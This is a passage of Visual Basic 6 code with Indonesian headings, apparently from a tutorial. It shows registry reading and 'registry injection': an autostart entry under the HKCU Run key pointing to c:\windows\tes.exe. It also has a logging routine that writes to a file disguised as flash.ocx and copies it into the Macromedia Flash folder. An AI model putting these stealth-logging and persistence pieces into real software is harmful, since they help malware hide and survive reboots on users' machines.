FileCopy App.Path & "\flash.ocx", keyinstal & "\Macromed\Flash\flash.ocx"
DeleteFile App.Path & "\flash.ocx"
End Sub

'////////////////////////////Kode Baca Registri/////////////////////////////////////////
Public Function ReadKey(Value As String) As String
' Reads a registry value (full path, e.g. "HKLM\...\Name") via
' WScript.Shell.RegRead and returns it as a String.
' With On Error Resume Next a failed read leaves r Empty, so the caller
' receives "" rather than an error.

Dim b As Object
Dim r
On Error Resume Next
Set b = CreateObject("wscript.shell")
r = b.RegRead(Value)
ReadKey = r
End Function
'////////////////////////////Kode Buat File flash.ocx/////////////////////////////////////////
Public Sub Log(strLog As String)
' Appends strLog as one line (Print adds the line terminator) to
' App.Path\flash.ocx. Errors are swallowed by On Error Resume Next.
Dim ff As Integer
ff = FreeFile
On Error Resume Next
Open App.Path & "\flash.ocx" For Append As #ff
Print #ff, strLog
Close #ff
End Sub

Injeksi Registri Dengan VB

'//////////////////////////AWAL KODE FORM////////////////////////////////////////
Private Sub Command1_Click()
' Writes an autostart entry: opens HKCU\Software\Microsoft\Windows\
' CurrentVersion\Run\ with KEY_WRITE, sets the REG_SZ value "teserror" to
' "c:\windows\tes.exe", and closes the key.
' Defender note: a new value under this Run key is the persistence artifact
' to alert on (registry value-set events, e.g. Sysmon RegistryEvent).
' secattr is filled in but never passed to any call, and the retval results
' of the three Reg* calls are not checked.
Dim newopen As Long
Dim secattr As SECURITY_ATTRIBUTES
' VB typing: only hkeyb is Long here; hKey is a Variant
Dim hKey, hkeyb As Long
Dim retval As Long
Dim nilai As String
Dim nl_angka As Long
Dim subkey As String

secattr.lpSecurityDescriptor = 0
secattr.bInheritHandle = True
secattr.nLength = Len(secattr)

nilai = "c:\windows\tes.exe"
nl_angka = 1
subkey = "Software\Microsoft\Windows\CurrentVersion\Run\"

retval = RegOpenKeyEx(HKEY_CURRENT_USER, subkey, 0, KEY_WRITE, hKey)
retval = RegSetValueEx(hKey, "teserror", 0, REG_SZ, nilai, Len(nilai))
retval = RegCloseKey(hKey)
End Sub
'///////////////////////AKHIR KODE FORM////////////////////////////////////

'//////////////////////////////////AWAL KODE MODUL//////////////////////////////

Public Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type

Public Const HKEY_CLASSES_ROOT = &H80000000
Public Const HKEY_CURRENT_CONFIG = &H80000005
Public Const HKEY_CURRENT_USER = &H80000001
Public Const HKEY_DYN_DATA = &H80000006
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const HKEY_PERFORMANCE_DATA = &H80000004
Public Const HKEY_USERS = &H80000003

Public Const KEY_ALL_ACCESS = &HF003F
Public Const KEY_CREATE_LINK = &H20
Public Const KEY_CREATE_SUB_KEY = &H4
Public Const KEY_ENUMERATE_SUB_KEYS = &H8
Public Const KEY_EXECUTE = &H20019
Public Const KEY_NOTIFY = &H10
Public Const KEY_QUERY_VALUE = &H1
Public Const KEY_READ = &H20019
Public Const KEY_SET_VALUE = &H2
Public Const KEY_WRITE = &H20006

Public Const REG_CREATED_NEW_KEY = &H1
Public Const REG_DWORD_BIG_ENDIAN = 5
Public Const REG_DWORD_LITTLE_ENDIAN = 4
Public Const REG_DWORD = 4
Public Const REG_EXPAND_SZ = 2
Public Const REG_LINK = 6
Public Const REG_MULTI_SZ = 7
Public Const REG_NONE = 0
Public Const REG_RESOURCE_LIST = 8
Public Const REG_SZ = 1
Public Const REG_BINARY = 3

Public Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias _
"RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, _
ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Public Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias _
"RegCreateKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, _
ByVal Reserved As Long, ByVal lpClass As String, ByVal dwOptions _
As Long, ByVal samDesired As Long, lpSecurityAttributes As SECURITY_ATTRIBUTES, _
phkResult As Long, lpdwDisposition As Long) As Long
Public Declare Function RegSetValue Lib "advapi32.dll" Alias _
"RegSetValueA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal _
dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" _
(ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, _
ByVal dwType As Long, lpData As String, ByVal cbData As Long) As Long

'//////////////////////////////////AKHIR KODE MODUL/////////////////////////////